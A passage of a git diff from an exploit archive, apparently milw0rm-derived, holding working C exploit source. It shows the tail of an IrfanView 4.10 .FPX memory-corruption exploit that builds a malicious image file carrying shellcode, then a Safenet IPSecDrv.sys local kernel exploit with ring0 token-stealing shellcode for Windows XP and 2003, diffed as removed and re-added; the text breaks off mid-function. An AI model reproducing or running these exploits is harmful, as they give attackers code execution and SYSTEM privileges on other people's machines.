+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfc\xfc\xfc\xf8\xf8"
+"\xf8\xf1\xf1\xf1\xf4\xf4\xf4\xf3\xf4\xf4\xf8\xf8\xf8\xfa\xfa\xfa"
+"\xf5\xf5\xf5\xf5\xf5\xf5\xf7\xf7\xf7\xf7\xf7\xf7\xf5\xf5\xf5\xf5"
+"\xf5\xf5\xfb\xfb\xfb\xff\xff\xff\xfe\xfe\xfe\xf5\xf5\xf5\xf6\xf6"
+"\xf7\xfd\xfd\xfd\xf2\xf2\xf2\xf9\xf9\xf9\xfb\xfb\xfb\xf7\xf7\xf7"
+"\xf3\xf3\xf3\xfb\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xf2\xf2\xf2\xd7\xd7\xd7\xd7\xd7\xd7\xcf\xcf"
+"\xcf\xc7\xc8\xc7\xcc\xcd\xcd\xca\xca\xcb\xca\xca\xca\xd3\xd3\xd4"
+"\xcc\xcd\xcd\xc7\xc8\xc8\xc4\xc5\xc5\xd4\xd5\xd5\xc4\xc4\xc4\xc7"
+"\xc8\xc7\xdb\xdc\xdb\xbe\xbf\xbf\xba\xbb\xbc\xc2\xc3\xc4\xd0\xd1"
+"\xd2\xef\xef\xef\xc6\xc6\xc6\xcc\xcd\xcd\xdb\xdb\xdc\xc9\xca\xc9"
+"\xc6\xc6\xc6\xe7\xe7\xe7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xf7\xf7\xf7\xbf\xbf\xc0\xa4\xa5\xa6\xb0\xb1"
+"\xb0\xbd\xbe\xbd\xc3\xc4\xc5\xc1\xc2\xc2\xaf\xaf\xb0\xb2\xb3\xb4"
+"\xb4\xb5\xb6\xb4\xb5\xb5\xb7\xb7\xb7\xca\xcb\xcc\xac\xae\xad\xae"
+"\xb0\xaf\xbe\xbe\xbe\x94\x95\x94\xe5\xe5\xe6\xaa\xab\xab\xba\xbb"
+"\xbc\xe4\xe4\xe5\xd3\xd4\xd4\xb3\xb3\xb3\xb0\xb0\xb0\xb9\xba\xba"
+"\xc0\xc1\xc2\xe7\xe7\xe8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfd\xfc\xfc"
+"\xfc\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xf4\xf4\xf4\xfd\xfd\xfd\xfd\xfd\xfd\xfa\xfa\xfa"
+"\xf2\xf2\xf2\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00"
+"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00"
+"\x03\x00\x00\x00\x04\x00\x00\x00";
+
+
+
+int main(int argc, char* argv[])
+{
+	FILE* fpxfile;
+	char evilbuff[110000];
+	int offset=0;
+
+	printf("[+] Irfanview 4.10 .FPX File Memory Corruption\n");
+	printf("[+] Coded and discovered by Marsu \n");
+	if (argc!=2) {
+		printf("[+] Usage: %s \n",argv[0]);
+		return 0;
+	}
+
+	memset(evilbuff,0,110000);
+	memcpy(evilbuff,FPX_file1,sizeof(FPX_file1)-1);
+	offset=sizeof(FPX_file1)-1;
+	memcpy(evilbuff+offset,FPX_file2,sizeof(FPX_file2)-1);
+	offset+=sizeof(FPX_file2)-1;
+	memcpy(evilbuff+offset,FPX_file3,sizeof(FPX_file3)-1);
+	offset+=sizeof(FPX_file3)-1;
+	memcpy(evilbuff+offset,FPX_file4,sizeof(FPX_file4)-1);
+	offset+=sizeof(FPX_file4)-1;
+	memcpy(evilbuff+offset,FPX_file5,sizeof(FPX_file5)-1);
+	offset+=sizeof(FPX_file5)-1;
+	memcpy(evilbuff+offset,FPX_file6,sizeof(FPX_file6)-1);
+	offset+=sizeof(FPX_file6)-1;
+	memcpy(evilbuff+offset,FPX_file7,sizeof(FPX_file7)-1);
+	offset+=sizeof(FPX_file7)-1;
+	memcpy(evilbuff+offset,FPX_file8,sizeof(FPX_file8)-1);
+	offset+=sizeof(FPX_file8)-1;
+
+	memcpy(evilbuff+0x5c3a,"\x90\xeb\x07\xcc\x56\x7B\x01\x10\x41\x41\x41\x41",12); //change this to debug
+	memcpy(evilbuff+0x5c3a+12,CalcShellcode,sizeof(CalcShellcode)-1);
+
+	printf("[+] FPX file patched!\n");
+
+	if ((fpxfile=fopen(argv[1],"wb"))==0) {
+		printf("[-] Unable to access file.\n");
+		return 0;
+	}
+
+	fwrite( evilbuff, 1, 102952, fpxfile );
+	fclose(fpxfile);
+	printf("[+] Done. Have fun!\n");
+	return 0;
+}
+
+// milw0rm.com [2008-01-28]
diff --git a/platforms/windows/local/5004.c b/platforms/windows/local/5004.c
index 20f8cfc9f..1bcf9a1fd 100755
--- a/platforms/windows/local/5004.c
+++ b/platforms/windows/local/5004.c
@@ -1,277 +1,277 @@
-/* safenet-ipsec-call.c
- *
- * Copyright (c) 2008 by 
- *
- * Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 indirect call SYSTEM exploit
- * by mu-b - Thu 03 Jan 2008
- *
- * - Tested on: IPSecDrv.sys 10.4.0.12
- *    bundle with: SafeNET HighAssurance Remote, SoftRemote
- *              - Microsoft Windows 2003 SP2
- *
- * user definable offset used in an indirect call.
- *
- * .text:10009970 000 mov     eax, [esp+arg_0]
- * .text:10009974 000 mov     ecx, [esp+arg_4]
- * .text:10009978 000 shl     eax, 4
- * .text:1000997B 000 push    ecx
- * .text:1000997C 004 call    off_1001C604[eax]
- *
- * Note: this can be made universal for all array offsets,
- * relatively easily since we control the offset and therefore
- * the memory address..
- * IPSecDrv.sys 10.4.0.12 - 0x1C604
- *              10.3.5.6  - 0x1B604
- *
- * Compile: MinGW + -lntdll
- *
- *    - Private Source Code -DO NOT DISTRIBUTE -
- * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
- */
-
-#include 
-#include 
-
-#include 
-#include 
-
-#define IPSECDRV_IOCTL  0x80002064
-
-#define ARG_SIZE(a)     ((a)/sizeof (void *))
-
-static unsigned char win32_fixup[] =
-  "\x53"
-  "\x52";
-
-static unsigned char win2k3_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\xb0\x18\x02\x00\x00"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xd8\x00\x00\x00"
-  "\x89\x88\xd8\x00\x00\x00"
-  "\x90";
-
-static unsigned char winxp_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\x70\x44"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xc8\x00\x00\x00"
-  "\x89\x88\xc8\x00\x00\x00"
-  "\x90";
-
-static unsigned char win32_ret[] =
-  "\x5a"
-  "\x5b"
-  "\xc2\x04\x00";
-
-struct ioctl_req {
-  void *arg[ARG_SIZE(0x4C)];
-};
-
-static PCHAR
-fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
-{
-  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
-
-  dwVersion = GetVersion ();
-  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
-  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
-
-  if (dwMajorVersion != 5)
-    {
-      fprintf (stderr, "* GetVersion, unsupported version\n");
-      exit (EXIT_FAILURE);
-    }
-
-  switch (dwMinorVersion)
-    {
-      case 1:
-        *zlen = sizeof winxp_ring0_shell - 1;
-        *(PDWORD) &winxp_ring0_shell[55] = ppid;
-        return (winxp_ring0_shell);
-
-      case 2:
-        *zlen = sizeof win2k3_ring0_shell - 1;
-        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
-        return (win2k3_ring0_shell);
-
-      default:
-        fprintf (stderr, "* GetVersion, unsupported version\n");
-        exit (EXIT_FAILURE);
-    }
-
-  return (NULL);
-}
-
-static PVOID
-get_module_base (void)
-{
-  PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
-  PSYSTEM_MODULE_INFORMATION pModuleInfo;
-  DWORD i, num_modules, status, rlen;
-  PVOID result;
-
-  status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
-  if (status != STATUS_INFO_LENGTH_MISMATCH)
-    {
-      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
-      exit (EXIT_FAILURE);
-    }
-
-  pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);
-
-  status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
-  if (status != STATUS_SUCCESS)
-    {
-      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
-      exit (EXIT_FAILURE);
-    }
-
-  num_modules = pModuleInfo->Count;
-  pModuleBase = &pModuleInfo->Module[0];
-  result = NULL;
-
-  for (i = 0; i < num_modules; i++, pModuleBase++)
-    if (strstr (pModuleBase->ImageName, "IPSECDRV.sys"))
-      {
-        result = pModuleBase->Base;
-        break;
-      }
-
-  HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);
-
-  return (result);
-}
-
-int
-main (int argc, char **argv)
-{
-  struct ioctl_req req;
-  LPVOID c_addr, p_addr;
-  LPVOID zpage, zbuf, base, pbase;
-  DWORD rlen, zlen, ppid;
-  HANDLE hFile;
-  BOOL result;
-
-  printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM exploit\n"
-          "by: \n"
-          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
-
-  if (argc <= 1)
-    {
-      fprintf (stderr, "Usage: %s \n", argv[0]);
-      exit (EXIT_SUCCESS);
-    }
-
-  ppid = atoi (argv[1]);
-
-  hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE,
-                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
-                       OPEN_EXISTING, 0, NULL);
-  if (hFile == INVALID_HANDLE_VALUE)
-    {
-      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
-      exit (EXIT_FAILURE);
-    }
-
-  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  if (zpage == NULL)
-    {
-      fprintf (stderr, "* VirtualAlloc failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("* allocated page: 0x%08X [%d-bytes]\n",
-          zpage, 0x10000);
-
-  c_addr = zpage;
-  base = get_module_base ();
-  p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 16);
-  printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr);
-  printf ("* call distance: 0x%08X\n", p_addr);
-
-  memset (zpage, 0xCC, 0x10000);
-  zbuf = fixup_ring0_shell (base, ppid, &zlen);
-  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
-  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
-  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
-          win32_ret, sizeof (win32_ret) - 1);
-
-  memset (&req, 0, sizeof req);
-  req.arg[0] = p_addr;
-
-  /* jump to our address   :)   */
-  printf ("* jumping.. ");
-  result = DeviceIoControl (hFile, IPSECDRV_IOCTL,
-                            &req, sizeof req, &req, sizeof req, &rlen, 0);
-  if (!result)
-    {
-      fprintf (stderr, "* DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("done\n\n"
-          "* hmmm, you didn't STOP the box?!?!\n");
-
-  CloseHandle (hFile);
-
-  return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2008-01-29]
+/* safenet-ipsec-call.c
+ *
+ * Copyright (c) 2008 by 
+ *
+ * Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 indirect call SYSTEM exploit
+ * by mu-b - Thu 03 Jan 2008
+ *
+ * - Tested on: IPSecDrv.sys 10.4.0.12
+ *    bundle with: SafeNET HighAssurance Remote, SoftRemote
+ *              - Microsoft Windows 2003 SP2
+ *
+ * user definable offset used in an indirect call.
+ *
+ * .text:10009970 000 mov     eax, [esp+arg_0]
+ * .text:10009974 000 mov     ecx, [esp+arg_4]
+ * .text:10009978 000 shl     eax, 4
+ * .text:1000997B 000 push    ecx
+ * .text:1000997C 004 call    off_1001C604[eax]
+ *
+ * Note: this can be made universal for all array offsets,
+ * relatively easily since we control the offset and therefore
+ * the memory address..
+ * IPSecDrv.sys 10.4.0.12 - 0x1C604
+ *              10.3.5.6  - 0x1B604
+ *
+ * Compile: MinGW + -lntdll
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
+ */
+
+#include 
+#include 
+
+#include 
+#include 
+
+#define IPSECDRV_IOCTL  0x80002064
+
+#define ARG_SIZE(a)     ((a)/sizeof (void *))
+
+static unsigned char win32_fixup[] =
+  "\x53"
+  "\x52";
+
+static unsigned char win2k3_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\xb0\x18\x02\x00\x00"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xd8\x00\x00\x00"
+  "\x89\x88\xd8\x00\x00\x00"
+  "\x90";
+
+static unsigned char winxp_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\x70\x44"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xc8\x00\x00\x00"
+  "\x89\x88\xc8\x00\x00\x00"
+  "\x90";
+
+static unsigned char win32_ret[] =
+  "\x5a"
+  "\x5b"
+  "\xc2\x04\x00";
+
+struct ioctl_req {
+  void *arg[ARG_SIZE(0x4C)];
+};
+
+static PCHAR
+fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
+{
+  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
+
+  dwVersion = GetVersion ();
+  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
+  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
+
+  if (dwMajorVersion != 5)
+    {
+      fprintf (stderr, "* GetVersion, unsupported version\n");
+      exit (EXIT_FAILURE);
+    }
+
+  switch (dwMinorVersion)
+    {
+      case 1:
